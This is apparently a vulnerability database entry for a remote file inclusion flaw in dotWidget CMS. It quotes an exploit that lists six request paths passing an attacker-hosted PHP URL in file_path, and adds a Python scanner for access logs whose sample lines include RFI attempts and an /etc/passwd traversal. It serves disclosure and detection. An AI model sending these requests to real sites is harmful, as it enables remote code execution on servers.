DotWidget CMS Multiple Remote File Include Vulnerabilities

Vulnerability ID: 1110411    Type: Code injection
Published: 2006-06-05    Updated: 2009-04-03
CVE: CVE-2006-2852    CNNVD ID: CNNVD-200606-118
Platform: PHP    CVSS score: 6.8
|Sources
https://www.exploit-db.com/exploits/1879
https://cxsecurity.com/issue/WLB-2006060051
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-118
|Details
dotWidget CMS is a web-based content management system. Several of its scripts pass the unvalidated file_path request parameter to an include, so a remote attacker can supply a URL and have the web server fetch and execute arbitrary PHP code, which amounts to arbitrary command execution in the context of the web server.
|Exploit
Title: dotWidget CMS <= 1.0.6 - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: dotWidget
URL: http://dotwigdet.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "dotwidget Printer-friendly"
-----------------------------------------------------------------

Exploitation:

/index.php?file_path=http://www.yourspace.com/yourscript.php?
/feedback.php?file_path=http://www.yourspace.com/yourscript.php?
/printfriendly.php?file_path=http://www.yourspace.com/yourscript.php?

EvilCookie <dorshirl[at]zahav.net.il> submitted these extra file_path issues.

/includes/common.inc?file_path=http://www.yourspace.com/yourscript.php?
/includes/nav.inc?file_path=http://www.yourspace.com/yourscript.php?
/admin/dotwidgetc_config.php?file_path=http://www.yourspace.com/yourscript.php?

# milw0rm.com [2006-06-05]
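As an added, defender-side example (not part of the advisory, the vendor's code, or this database entry), the script below scans web server access log lines for the request shape shown in the advisory: a query parameter whose value is itself a URL, which is what a remote file include attempt looks like on the wire. The log lines, hostnames, addresses and file names are constructed for the example; the parameter name file_path and the affected script paths are the ones the advisory lists.

```python
"""Flag remote-file-include attempts in Combined Log Format access logs.

Added example, not part of the advisory. A parameter value that carries its
own URL scheme (http://, https://, ftp://) or a PHP stream wrapper that
include() honours (php://, data://) is the signature; the affected dotWidget
scripts take such a value in ``file_path``. Sample lines are constructed.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log (hosts, IPs and file names are made up).
SAMPLE_LOG = """\
203.0.113.5 - - [05/Jun/2006:10:01:02 +0000] "GET /index.php?file_path=http://example.net/x.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.7 - - [05/Jun/2006:10:01:05 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [05/Jun/2006:10:01:09 +0000] "GET /includes/common.inc?file_path=ftp://example.net/x.txt HTTP/1.1" 200 90 "-" "curl/7.15"
192.0.2.9 - - [05/Jun/2006:10:02:11 +0000] "GET /printfriendly.php?file_path=../../etc/passwd HTTP/1.1" 500 0 "-" "Mozilla/5.0"
"""

# Minimal Combined Log Format parser: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Remote schemes and wrappers that PHP's include() will fetch when
# allow_url_include / allow_url_fopen are enabled. A plain "../" traversal
# (local file inclusion) is a different check and is deliberately not matched.
REMOTE_SCHEME_RE = re.compile(r'^(?:https?|ftp|php|data)://', re.IGNORECASE)


def parse_line(line):
    """Return the fields we need from one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    # keep_blank_values keeps the trailing "?" trick (empty second query) visible
    params = parse_qsl(parts.query, keep_blank_values=True)
    return {
        'ip': m.group('ip'),
        'ts': m.group('ts'),
        'path': parts.path,
        'params': params,
        'status': int(m.group('status')),
    }


def find_rfi_attempts(log_text):
    """Return one hit per (request, parameter) whose value is a remote URL."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec['params']:
            if REMOTE_SCHEME_RE.match(value.strip()):
                hits.append({
                    'ip': rec['ip'],
                    'ts': rec['ts'],
                    'path': rec['path'],
                    'param': name,
                    'value': value,
                    'status': rec['status'],
                })
    return hits


def summarize_by_source(hits):
    """Count hits per client IP so repeated probing stands out."""
    counts = {}
    for h in hits:
        counts[h['ip']] = counts.get(h['ip'], 0) + 1
    return counts


if __name__ == '__main__':
    found = find_rfi_attempts(SAMPLE_LOG)
    for h in found:
        print(f"{h['ts']} {h['ip']} {h['path']} {h['param']}={h['value']} -> {h['status']}")
    print(summarize_by_source(found))
```

A 200 status on a flagged request is the line to triage first: with allow_url_include enabled, a successful include of the remote file means the fetched code ran. The traversal line in the sample is left unflagged on purpose; a local file inclusion check would look at path separators in the value rather than at a URL scheme.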
|References

XF: dotwidget-filepath-file-include(26918), http://xforce.iss.net/xforce/xfdb/26918
BID: 18258, http://www.securityfocus.com/bid/18258
BUGTRAQ: 20060603 [MajorSecurity#7] dotWidgetCMS <= 1.0.6 - Remote File Include Vulnerability, http://www.securityfocus.com/archive/1/archive/1/435870/100/0/threaded
OSVDB: 25982, http://www.osvdb.org/displayvuln.php?osvdb_id=25982
OSVDB: 25983, http://www.osvdb.org/25983
OSVDB: 25981, http://www.osvdb.org/25981
MISC: http://www.majorsecurity.de/advisory/major_rls7.txt
VUPEN: ADV-2006-2141, http://www.frsirt.com/english/advisories/2006/2141
SECTRACK: 1016220, http://securitytracker.com/id?1016220
SREASON: 1045, http://securityreason.com/securityalert/1045
SECUNIA: 20463, http://secunia.com/advisories/20463